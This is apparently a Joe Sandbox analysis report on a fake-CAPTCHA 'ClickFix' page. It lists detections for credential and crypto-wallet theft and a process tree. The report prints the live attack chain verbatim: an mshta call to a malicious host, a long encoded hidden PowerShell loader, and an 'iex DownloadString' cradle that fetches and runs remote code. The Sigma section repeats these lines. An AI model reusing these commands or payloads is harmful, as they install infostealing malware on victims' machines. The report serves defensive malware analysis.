Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://escooterzone.com/play.html

Overview

General Information

Sample URL:https://escooterzone.com/play.html
Analysis ID:1592165
Infos:

Detection

CAPTCHA Scam ClickFix
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detect drive by download via clipboard copy & paste
Sigma detected: Powershell Download and Execute IEX
Yara detected CAPTCHA Scam ClickFix
AI detected suspicious Javascript
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Phishing site or detected (based on various text indicators)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Yara detected Costura Assembly Loader
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found

Classification

Process Tree

  • System is w10x64_ra
  • chrome.exe (PID: 5764 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
    • chrome.exe (PID: 5128 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=1936,i,3349664962166437789,8395394203860028808,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • chrome.exe (PID: 6556 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://escooterzone.com/play.html" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • svchost.exe (PID: 6164 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • mshta.exe (PID: 6700 cmdline: "C:\Windows\system32\mshta.exe" https://agiledeals.shop/s6.pdf # ? ''I am not a robot - reCAPTCHA Verification ID: 2165 MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
    • powershell.exe (PID: 6260 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -Enc JABuAE0AcQA1AEwAaQBPAGIAUABYAEgAVwBGAEgAbABkAGsAOQBQAFMAMQBPAEcAeQBSADQAMwBJAGMAdwByAFgAWgBkAE8ATQBiAEYATgBLAFQAUQAgAD0AIAAkAGYAQQBMAHMARQANAAoAJAB6AEYAUQBQAGEAcQBzAHcANgB6AHUAMgBlAGgANQBKAGMATgBIAFoAaABsAHkAbwBjAFoAaABXAFoAMQBqAGsANABiAEsAUQBjAHQAawBtAGEAWABpAGwAQwB6ADIAcABzAEwATABqAEwAegB1AGMAawBiAFQAdAB5AEUARQBWAHIASAB5AG0AMgBjAGgARQBCAHUAUQA3AGMAeQBkAE4AIAA9ACAAJABUAFIAVQBlAA0ACgAkAGsATQBJAGIAdwBJAFMAOABUAHEAMwA2ADYAMABrAGEAbgAyAEMAWQBGAE0AYwBkAFcAZQBOAEIAVwAxAHcAWQBWAHUAegBvAEMAYgBaADYANgB5AHIAbgBXAGUAdQB3ADkATQBEAEkAdwBEAGcAZQBTAEsAZAA1AHAAWQAxAEcAWQBpAEgAVwBnAEUAVwBMAHkAUQBSADgAZAAyAEoAbwA3AFQAawBNAFEAYwBNADMAawAzAG8ARQBSADcAaABzAFoATgBOAHMAOABPADMATgBDAGIAMwBBAFAATgBqADQATQBsAEYAUwBlAGwAdwBNAHQAUwBpAHoAQgBYAGkAUQBwAFAAYwBWAGsAeAB0AEgAUQBZAEMAVQBDAFcAMgBTAEkAdwBIAFAARwBsAFkAcABLAHQAdQBHAGQASgBjAEsAYQBYADYANgA2AG4AZwByAFMAOAA2AEQAdgBFAEQAZwAwAGUARABHAHMAcQBSAEgAeABkAGcAbQA2AE4ARQBxAE8AawBjADYARwA3AEcARABRAEQARgB2AHUAcABCAEcAcQB2ADQAagA1AEUAbABwAHkAUAB2ADAAcQBjAE4ANwBaADUAZwB1AHcAZQBMAEQAVQB1AFUAcgBQAHEAbAAgAD0AIAAkAG4AVQBMAEwADQAKACQAbQBkAEEATQBZAG0AVQBFAGIAYgBwAHgAQgBXAFkAQQBhAHMAWgBtAE4AUwBXADcATwBMAEoAQQByAGUAUABIAFgASABUAFQAUQA1AHMANgBNAHEAcQBuAHcAdwBFADAAcABlAFcARwBlAFoATQBvAE4AdABKADMARgBSADcAUwB4AHUAWQBjAHEAcwBkAGoAcwBiAGIAbQBrAGkAeABQAHoAZwBmAGoAUwBuAEoAOQBBAEYAVwBFAFkASwBMAEUAWQBZAHIATABCAEMAZQBkAFgANABkAEsAbgBJAFoARgB3AHcAYgBoAEEARABWAHMATQBPAGIAbAB1AFgAOABSAFkARQBJAGEATABPAHEATQBDAFAASAB3AEQAdQBZAHgAVABPADQAdAAyAEgAbQBsAHoARgB5AGMATQBtAEgAMQA4AGMARwB6AEoAWgBnAEkANQBzAHgAUwBuAHkAZQBmADYAbgB5AHAAdABLAGUAdgA1AEEAWAA1AFIAdwBCADQAZABrAHEARQBJAE0AZgBRAFcAMwB0AEcAQwBSAFYATQBPAHAARQA0AEcAdABpAEEAeQBtAEIANgBmADMAYwBkAHIANwBCAE0AUQBQAEcAaQBtAFkAYgBkAFIAbQBQAFYANQBBAFIAWQBoAGIAUwBnADcAegBvAEsAVAB0AE4AZwBJAEkARQBJAEgAbgBjAFoAVgAyADAANABzAE4AVQBSAGQAYgBOADkAYwBXAFcAUQBLAHUATQBwAGoAcQBtAGgAeQBtAEcAYwBRAHcAMABDADcAdQB1AFQAUQByAEcAMAAxAEYAZgAyAFgAegAgAD0AIgBEAGUAZgBsAGEAIgAgACsAIAAiAHQAZQBTAHQAcgBlAGEAbQAiADsAJABkADEATwBCAHgATAAxADcAVQAxADQANABWAFEAbABpADkAZAA5AFEATwBMADcANQB6AFQAMAAzAHgASABJAEwAYgBrAHoAZABnADkAWAA1AEEAWABjAEUAMQB4ADAAUAB1ADgAVQBRADkAVABiAG0ARQBWADkAYgBUAGEAWABGAGMATwA4ADIAeABVADcAbAB3AG4AVgBTAHMAUQAyAHMAOABFAGgAZABnAEQAaQBaAGsATwA3AFMAZwB6ADAATwBSAE4AegBTAHMAWgA3AEEAagBCAFQAWgBJAGQAOABiAFEAOABCADUAUQA2AE8AcwBSAGwAZQA2AGQASABRAGsAWgBwAEwAeQBxAHIAcABpAHUATQBtAFgAUQBSAFcAWQBGAGwAOABFAG8AbABJAFcAUQB0ADUAcABnAE0AagA2AFkAdQBwAFIAYwBEADkAeAA2AFMATQBYADEAcwBaADMAVAA1AG4ARgA5AHoANgB1AEwAbABjAEoAOQBHAEUAaQBUAFoAOQBhAFQATAA4AGYANQBxAGIAWQBMAGcAagAyAFIAeQBuADkAaQBqAE4AdABuAHgAVAByAG0AcwBRAGMAcQBnADEAVgBaAGsAUABoAFYAaABkADUAdwBvAHIATgB2AG4AMgA1AGYAWABYAE8AYQBTAHcAMQBqAFcARwBBAGsAagBkADQATAB6AHcATwBuAGwAZABwAGoARABkADEASwBTAGgAWABkADcAbwBTAFkANwBOAFAAeAB5AFUATABzADcAZwBGADkAZQBxAGMAUwBPAG4AOQAyAGYAYwBmAEkAUQB5AEYAegBLAGUAdwBhAEgAcgB4AEkAUQBvAGYATwBEAGUATABiAFkAQwB0AHEATABpAHMAYQBGAE0AYwBRAHoAQwBsAHQAawBkAG0AMwBSADkATQBPAHAAbAAgAD0AIAAiAEMAbwBtAHAAcgBlACIAIAArACAAIgBzAHMAaQBvAG4AIgA7ACAAJAAxAHAAcwBKAGIAagBoAE8AaAB1AEwANgBWAG0AeABaAEIAbwAzAE4ARQBCADkAdABZAFIAawBUAGUATABrAE0AVQBJADQAZABqADAANgBsAG0AUgBMAEYASgA3AE4ATABtAGIASABJADYAUQBTAFAAMgBnADUAMgAwAFAAdQBOAGgAQwBrAGUATABkADQAOABQAHcAVABVAGwAQQBSAG0AOABOADIAUwBlAGEAaQBWAFgAZgBkADIASgBqAGEAdQB3AFcAagBXADMANABzAHUAUQBhAHYAZABEAGIAUgBFAGMAMQBhAE4ANgB0AFYAaQA4AFgAdgBIADIAdwBiAE4ARwBPADEANQBHAFoASwAzADIAcQA2AGsATAAxAFoATwBhAFEAYwBDAE0AawBVAGUAZwA4AGoAcwBnAGoAeQB6AG8AWgBGAEYARgBwAHoAUgB5AEkAeAB4AEYAdQBhAEQAdwBCAHUAMQBnAFEAdABPAHIAaABWAFgAZQBMADkAbgBLAGkATQBZAFcASABGAFAAWQBXAFEARABpADcAWABVAG8AagBIAGMAawBzAGMAdgBkAFQAUwBrAFcATwBSAEwAWABRAHMAbgBMAEgAaABxADEAcgBCAG4AbQBCAEQAcQB5AGgAdABLAFAAawBGADAATQBCAGgASQBVAEIANAB6AGwAawBNAEgAVABTAEQAVgBMAEMATwB5ADUANgBYAG0ANgBnADYAWgBzAG0AWABBAHMAegA0AFYAcABNAFcAMwAxAE4ARwBvAFMAawBSADkAcQBzAFEAZQBKAHkAUgB2ADQASgBSADMATgBRAGIAYwBKAE0AWABoAGkAYQBSADUAaQB6AHgAawB3ADQATABYAFMAeQBIADkANwBlAHAASABkAFIASABIAGgANQBDADIAaAB4AHIAcgBuAEIAWQA1AGwASQBiAGoAZABMADQAZABvAFkAMAB1ADkAaABHAGcAdQBZAHcANgBiAFkAbQBqAFQATQB4AHoARgBEAGcANQBuAFAAOABBAEEASwB4AFQANABEAGEAWABaAGMAVgBxADkATABjAGMARwBOADcANQBRADkANABFAEMARgBHAHkASABnAHUAYwBiAHcAcABaAHAATQB5AGgAQQB0AEcAdQBaAGwAZgBwAE0ASwBLAFUANABVAE0ANwBCAEoAaQBzAHAASQBlADcAYwBHADEAQwBPAFYAZwA4AEoAWAAxAG0AeAA0AHEAcgBiAFgAeQBWAGsANwBkAHgASQA4AHYAcQBrAGcAZgB2AHkARwByAGkAcABaAEQAbQBJADYASgBPAGkAdQBxAFcAbgBMADgARAAyAHUAQQB1AHIAVgBVAGYANgAyAGIAbwBFAGkARQBUAEgAYwBlAHMAbQBSAEQAZwByAGkAaQBQADQAcQBaAEoANwBPAGQAZABKAFMATgB6ADAAWABTAG0AMgBxADUAZwAyAFYAQwBBAG8ARABJAE0AVgA3AGoAVwBnADAAZABzAFUAZwA4ADYASgBLAE0ASQA3AHQAeQBXAGMAdgBYAEkATwBpAHkANgBRAEEAeABUADkAbgBrAHUAUQBGAEcAQQBhAHkARQBCADgASQAyAFoAbQB2AFEAZQBkAEMATgBvAE4ATAA1ADMAYwBlAHQAbQA5ADMAVQBqAFUANQBpAHMAaAA3AG4ATQBsAE0AdgBsAE8AVwBxAEcAagBkADcAcgBOADEAWABGAEYAbgBkAGUATABxAFAAMAA4AEoAWgB4AEgASwBHAGkARwBwAEMAdABPAG0ARgBQAFUAWABHAGIAdgB1AG8AaAAyAHQAUwAzAFcAUgBnAHUAOQBRAFcAUAB2AEUANQBsAGcAcQBpAHEAeQBQAEQAbwB1AHYAMwBkAE0ANABoAEIAVwByAFMAUABaAFUAMgA2AFoAdgBZAEEAOQAwAHAAcgBtADAAbAAxAGIAaAA3ADQAeABPADIAMgBuAHYAdgA4AHIARwBFAEcAWgBxAGkANgBkAEEAcQBxAFUAegBQAGIAVQAwAHAAOABtAEwASAAgAD0AIgBTAHQAcgBlAGEAIgAgACsAIAAiAG0AUgBlAGEAZABlAHIAIgA7ACAALgAoACIAaQAiACsAIgBlAHgAIgApACAAJAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgAkADEAcABTAGoAYgBKAGgATwBIAFUAbAA2AHYATQB4AFoAYgBvADMAbgBlAGIAOQBUAFkAUgBrAHQARQBsAGsATQBVAGkANABkAEoAMAA2AEwAbQByAEwAZgBKADcAbgBMAE0AYgBoAEkANgBRAHMAUAAyAEcANQAyADAAcAB1AE4AaABjAGsAZQBsAEQANAA4AFAAVwBUAHUAbABhAHIAbQA4AE4AMgBzAEUAQQBJAHYAWABGAGQAMgBqAEoAQQB1AFcAdwBqAFcAMwA0AFMAdQBxAEEAVgBEAEQAYgBSAGUAYwAxAEEAbgA2AFQAVgBpADgAWAB2AGgAMgBXAGIAbgBHAG8AMQA1AGcAegBrADMAMgBxADYAawBMADEAegBvAGEAUQBDAGMATQBrAHUAZQBnADgASgBzAGcASgB5AFoAbwBaAGYAZgBmAFAAWgBSAFkASQB4AHgARgB1AGEARAB3AGIAVQAxAGcAcQB0AG8AcgBoAFYAeABlAEwAOQBOAEsAaQBNAFkAVwBoAEYAUABZAFcAUQBkAGkANwBYAHUATwBKAEgAQwBrAHMAYwBWAGQAVABTAEsAdwBvAFIAbABYAHEAUwBuAGwASABoAFEAMQByAGIAbgBtAGIAZABRAFkAaAB0AGsAcABrAEYAMABNAGIAaABJAFUAYgA0AHoATABrAG0AaABUAHMAZABWAEwAYwBPAFkANQA2AFgATQA2AGcANgB6AFMAbQB4AEEAUwBaADQAVgBwAE0AVwAzADEATgBHAE8AcwBrAFIAOQBRAFMAUQBFAGoAeQBSAFYANABqAHIAMwBOAFEAQgBjAGoATQB4AGgAaQBhAHIANQBpAFoAeABrAFcANABMAFgAUwBZAGgAOQA3AEUAcABIAGQAUgBIAGgAaAA1AEMAMgBoAFgAcgBSAE4AYgB5ADUATABJAEIAagBEAGwANABEAE8AWQAwAHUAOQBoAEcAZwB1AFkAVwA2AGIAeQBtAEoAVABtAHgAegBGAEQARwA1AE4AUAA4AEEAYQBrAHgAdAA0AEQAQQB4AHoAQwBWAFEAOQBsAGMAQwBHAE4ANwA1AFEAOQA0AGUAQwBGAGcAeQBoAGcAVQBjAEIAdwBwAHoAUABtAHkASABBAFQARwBVAFoAbABmAHAAbQBrAGsAVQA0AFUAbQA3AGIASgBpAHMAUABpAEUANwBjAGcAMQBDAE8AVgBHADgASgBYADEAbQBYADQAcQByAEIAeAB5AFYAawA3AEQAWABJADgAVgBxAGsARwBGAFYAWQBnAFIASQBQAFoAZABNAEkANgBKAG8ASQBVAHEAVwBOAEwAOABkADIAVQBBAFUAUgB2AHUAZgA2ADIAQgBvAGUAaQBFAFQAaABDAGUAUwBNAFIAZABHAFIASQBpAHAANABRAFoASgA3AG8AZABkAGoAUwBuAFoAMAB4AHMATQAyAFEANQBnADIAdgBDAEEATwBkAEkATQB2ADcAagB3AEcAMABEAHMAVQBnADgANgBqAEsAbQBpADcAVABZAFcAQwBWAFgAaQBPAGkAeQA2AFEAYQB4AFQAOQBOAEsAVQBRAEYARwBBAEEAWQBlAGIAOABJADIAWgBtAFYAUQBFAGQAYwBuAG8AbgBsADUAMwBjAEUAVABNADkAMwB1AGoAdQA1AGkAcwBoADcAbgBtAGwAbQBWAGwATwBXAFEAZwBqAEQANwByAG4AMQB4AGYARgBOAGQAZQBsAHEAcAAwADgAagB6AFgAaABrAEcASQBHAHAAYwBUAE8ATQBGAFAAdQBYAEcAYgB2AFUATwBIADIAdABzADMAdwByAGcAdQA5AFEAdwBQAFYARQA1AGwAZwBRAEkAcQB5AHAARABvAFUAVgAzAEQAbQA0AEgAYgB3AHIAcwBQAHoAVQAyADYAWgBWAFkAYQA5ADAAcAByAG0AMABMADEAYgBoADcANABYAG8AMgAyAE4AVgB2ADgAcgBnAEUAZwB6AHEASQA2AGQAQQBRAFEAVQBaAFAAYgB1ADAAUAA4AG0AbABIACAAKAAkACgATgBlAHcALQBPAGIAagBlAGMAdAAgAGkATwAuACQARAAxAG8AYgBYAEwAMQA3AHUAMQA0ADQAVgBRAEwAaQA5AGQAOQBRAG8AbAA3ADUAWgB0ADAAMwB4AGgASQBMAGIAawBaAEQAZwA5AHgANQBBAHgAYwBlADEAWAAwAHAAVQA4AHUAcQA5AHQAQgBNAGUAdgA5AGIAVABhAFgAZgBDAE8AOAAyAFgAVQA3AGwAVwBOAHYAcwBTAHEAMgBTADgARQBIAGQARwBkAEkAWgBLAG8ANwBTAGcAWgAwAE8AUgBOAHoAUwBzAFoANwBBAEoAYgBUAFoASQBEADgAQgBxADgAYgA1AFEANgBPAHMAUgBMAGUANgBEAEgAUQBLAFoAUABMAFkAUQBSAFAAaQB1AE0AbQBYAFEAcgB3AFkAZgBMADgARQBvAGwASQBXAHEAVAA1AHAAZwBNAEoANgBZAFUAUABSAEMARAA5AHgANgBzAG0AeAAxAHMAegAzAHQANQBOAGYAOQB6ADYAVQBsAGwAQwBKADkAZwBFAEkAVAB6ADkAYQB0AGwAOABmADUAUQBiAFkAbABnAEoAMgByAFkATgA5AGkAagBOAFQATgB4AHQAcgBNAFMAcQBjAHEARwAxAHYAWgBLAHAASABWAGgARAA1AHcAbwByAG4AVgBuADIANQBGAFgAWABPAEEAcwBXADEAagBXAEcAYQBrAEoAZAA0AGwAWgB3AG8ATgBsAGQAcABKAEQARAAxAGsAcwBoAHgAZAA3AE8AUwBZADcAbgBQAHgAWQBVAEwAcwA3AGcAZgA5AGUAUQBjAHMATwBuADkAMgBGAGMAZgBJAHEAeQBmAFoASwBFAFcAYQBIAHIAeABpAHEAbwBmAG8AZABFAGwAYgB5AGMAVABxAGwAaQBTAGEARgBtAEMAUQBaAGMATABUAEsAZABtADMAcgA5AE0ATwBwAGwALgAkAE0AZABhAE0AWQBNAFUARQBCAGIAUAB4AGIAVwB5AGEAYQBTAFoATQBuAHMAVwA3AE8ATABqAGEAUgBlAHAASABYAEgAVAB0AHEANQBTADYAbQBRAFEAbgBXAHcARQAwAFAARQBXAEcAZQBaAE0AbwBuAHQAagAzAGYAUgA3AFMAeAB1AHkAQwBxAFMARABqAHMAQgBCAG0AawBpAHgAcABaAGcAZgBqAHMAbgBKADkAYQBGAHcAZQBZAGsATABlAHkAeQBSAEwAYgBjAEUARABYADQAZABLAE4ASQB6AEYAVwB3AEIASABBAGQAdgBzAG0ATwBiAEwAdQB4ADgAUgBZAGUAaQBBAEwATwBRAG0AQwBwAEgAdwBEAHUAWQBYAFQATwA0AHQAMgBoAG0AbAB6AEYAeQBDAE0ATQBoADEAOABDAGcAegBKAHoAZwBpADUAcwB4AFMAbgB5AGUAZgA2AE4AWQBwAHQASwBlAFYANQBBAFgANQByAFcAYgA0AGQAawBRAGUASQBtAGYAUQBXADMAdABHAGMAcgBWAE0ATwBwAEUANABnAFQAaQBhAFkAbQBiADYARgAzAGMAZAByADcAYgBtAHEAcABnAEkAbQBZAEIARAByAG0AUABWADUAQQByAFkAaABCAFMARwA3AFoATwBrAFQAdABOAEcASQBJAGUAaQBoAG4AYwBaAHYAMgAwADQAUwBuAFUAcgBkAGIATgA5AEMAVwBXAFEAawB1AG0AcABKAHEAbQBIAFkATQBnAGMAcQB3ADAAYwA3AFUAVQB0AFEAcgBHADAAMQBmAEYAMgB4AFoAIAAoACQAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAaQBPAC4AbQBlAE0ATwBSAFkAcwB0AHIAZQBBAG0AKAAsACQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoAKAAiAEYAcgBvAG0AQgAiACAAKwAiAGEAcwBlADYAIgAgACsAIAAiADQAUwB0AHIAaQBuAGcAIgApACgAIgBOAFkAOAB4AGIAOABJAHcARQBJAFgALwB5AGkAawBMAHkAVwBBAEgAcABLAG8ARABXADUAVQBPAEgAUwBwAEEAeQBwAEEAbABVAG4ASABJAGwAUgBqAFoAUABzAHQAMwB4AE8AVABmAE4ANwBUAHEAKwBOADcAdwB2AGUAKwAxAFkAcABLAG8AVQA2AEkATABNAGsAUABSADcAUAB2AE8AaABwAEUAeQA5ACsAMwBDAEgAZQBYAFgAbAAvAC8AaQBSAEIAbABUAE8ANgBGAHoALwBiAHoAVAAyAHoANAArAE0AegArAHoAeABnAGMAVwBvAE4ANwBTADkAZQA0AHgAeQBLAGQAbABnAFUASgBsAG0ATwB3ADQAWQBnAEMARgBFAFkAWQBsAG0AcABXAHYAQQBrAFYAUQBEAFgAbAB2AHcAZwBqAG4AdwB1AEkARAB5AHYASwBBAFcAUgAyAEgARwAxADQARQAxAGwARgBCAHIAdwA4AG8AdQBzAE8AaABjAFgAYgBsAFYAZgBxAGQAYwBuAEIAawB4AGwAYQBTAEQAZABkAHkATQA0AGwARQAzAHQAYwAxADcAdgBRADMAVwBVAGMAegBKAHIAbQBuAFkARgBLAHkAcwAzAEcAYQBKADQAcQAxAGkAZgBFAHIAWQB2AEsAVwAyAFYASgBnAGYAVwBNAEsAbQA2AG8ANgBGADYAdgBwADMANgBOAFcARgBvAGYAdwA4AFMAdgA1AEEAdwA9AD0AIgApACkAKQApACwAIABbAGkAbwAuAGMATwBNAFAAUgBFAFMAUwBJAE8ATgAuAGMATwBtAFAAcgBlAFMAUwBpAG8AbgBNAG8ARABFAF0AOgA6ACgAIgBEAGUAIgAgACsAIgBjAG8AbQBwAHIAZQBzAHMAIgApACkAKQAsACAAWwBUAEUAeABUAC4ARQBuAEMATwBkAEkATgBHAF0AOgA6AEEAUwBDAEkASQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwA= MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7460 cmdline: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://e1.foiloverturnarrival.shop/app_permissions.json'))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 7468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8184 cmdline: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cleanup

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000014.00000002.2164204062.0000000008540000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security

    HTML

    SourceRuleDescriptionAuthorStrings
    1.0.pages.csvJoeSecurity_CAPTCHAScamYara detected CAPTCHA Scam/ ClickFixJoe Security
      1.1.pages.csvJoeSecurity_CAPTCHAScamYara detected CAPTCHA Scam/ ClickFixJoe Security

        Sigma Signatures

        System Summary

        barindex
        Sigma detected: PowerShell Download and Execution Cradles
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://e1.foiloverturnarrival.shop/app_permissions.json'))" , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://e1.foiloverturnarrival.shop/app_permissions.json'))" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -Enc JABuAE0AcQA1AEwAaQBPAGIAUABYAEgAVwBGAEgAbABkAGsAOQBQAFMAMQBPAEcAeQBSADQAMwBJAGMAdwByAFgAWgBkAE8ATQBiAEYATgBLAFQAUQAgAD0AIAAkAGYAQQBMAHMARQANAAoAJAB6AEYAUQBQAGEAcQBzAHcANgB6AHUAMgBlAGgANQBKAGMATgBIAFoAaABsAHkAbwBjAFoAaABXAFoAMQBqAGsANABiAEsAUQBjAHQAawBtAGEAWABpAGwAQwB6ADIAcABzAEwATABqAEwAegB1AGMAawBiAFQAdAB5AEUARQBWAHIASAB5AG0AMgBjAGgARQBCAHUAUQA3AGMAeQBkAE4AIAA9ACAAJABUAFIAVQBlAA0ACgAkAGsATQBJAGIAdwBJAFMAOABUAHEAMwA2ADYAMABrAGEAbgAyAEMAWQBGAE0AYwBkAFcAZQBOAEIAVwAxAHcAWQBWAHUAegBvAEMAYgBaADYANgB5AHIAbgBXAGUAdQB3ADkATQBEAEkAdwBEAGcAZQBTAEsAZAA1AHAAWQAxAEcAWQBpAEgAVwBnAEUAVwBMAHkAUQBSADgAZAAyAEoAbwA3AFQAawBNAFEAYwBNADMAawAzAG8ARQBSADcAaABzAFoATgBOAHMAOABPADMATgBDAGIAMwBBAFAATgBqADQATQBsAEYAUwBlAGwAdwBNAHQAUwBpAHoAQgBYAGkAUQBwAFAAYwBWAGsAeAB0AEgAUQBZAEMAVQBDAFcAMgBTAEkAdwBIAFAARwBsAFkAcABLAHQAdQBHAGQASgBjAEsAYQBYADYANgA2AG4AZwByAFMAOAA2AEQAdgBFAEQAZwAwAGUARABHAHMAcQBSAEgAeABkAGcAbQA2AE4ARQBxAE8AawBjADYARwA3AEcARABRAEQARgB2AHUAcABCAEcAcQB2ADQAagA1AEUAbABwAHkAUAB2ADAAcQBjAE4ANwBaADUAZwB1AHcAZQBMAEQAVQB1AFUAcgBQAHEAbAAgAD0AIAAkAG4AVQBMAEwADQAKACQAbQBkAEEATQBZAG0AVQBFAGIAYgBwAHgAQgBXAFkAQQBhAHMAWgBtAE4AUwBXADcATwBMAEoAQQByAGUAUABIAFgASABUAFQAUQA1AHMANgBNAHEAcQBuAHcAdwBFADAAcABlAFcARwBlAFoATQBvAE4AdABKADMARgBSADcAUwB4AHUAWQBjAHEAcwBkAGoAcwBiAGIAbQBrAGkAeABQAHoAZwBmAGoAUwBuAEoAOQBBAEYAVwBFAFkASwBMAEUAWQBZAHIATABCAEMAZQBkAFgANABkAEsAbgBJAFoARgB3AHcAYgBoAEEARABWAHMATQBPAGIAbAB1AFgAOABSAFkARQBJAGEATABPAHEATQBDAFAASAB3AEQAdQBZAHgAVABPADQAdAAyAEgAbQBsAHoARgB5AGMATQBtAEgAMQA4AGMARwB6AEoAWgBnAEkANQBzAHgAUwBuAHkAZQBmADYAbgB5AHAAdABLAGUAdgA1AEEAWAA1AFIAdwBCADQAZABrAHEARQBJAE0AZgBRAFcAMwB0AEcAQwBSAFYATQBPAHAARQA0AEcAdABpAEEAeQBtAEIANgBmADMAYwBkAHIANwBCAE0AUQBQAEcAaQBtAFkAYgBkAFIAbQBQAFYANQBBAFIAWQBoAGIAUwBnADcAegBvAEsAVAB0AE4AZwBJAEkARQBJAEgAbgBjAFoAVgAyADAANABzAE4AVQBSAGQAYgBOADkAYwBXAFcAUQBLAHUATQBwAGoAcQBtAGgAeQBtAEcAYwBRAHcAMABDADcAdQB1AFQAUQByAEcAMAAxAEYAZgAyAFgAegAgAD0AIgBEAGUAZgBsAGEAIgAgACsAIAAiAHQAZQBTAHQAcgBlAGEAbQAiADsAJABkADEATwBCAHgATAAxADcAVQAxADQANABWAFEAbABpADkAZAA5AFEATwBMADcANQB6AFQAMAAzAHgASABJAEwAYgBrAHoAZABnADkAWAA1AEEAWABjAEUAMQB4ADAAUAB1ADgAVQBRADkAVABiAG0ARQBWADkAYgBUAGEAWABGAGMATwA4ADIAeABVADcAbAB3AG4AVgBTAHMAUQAyAHMAOABFAGgAZABnAEQAaQBaAGsATwA3AFMAZwB6ADA
        Sigma detected: Suspicious Encoded PowerShell Command Line
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -Enc 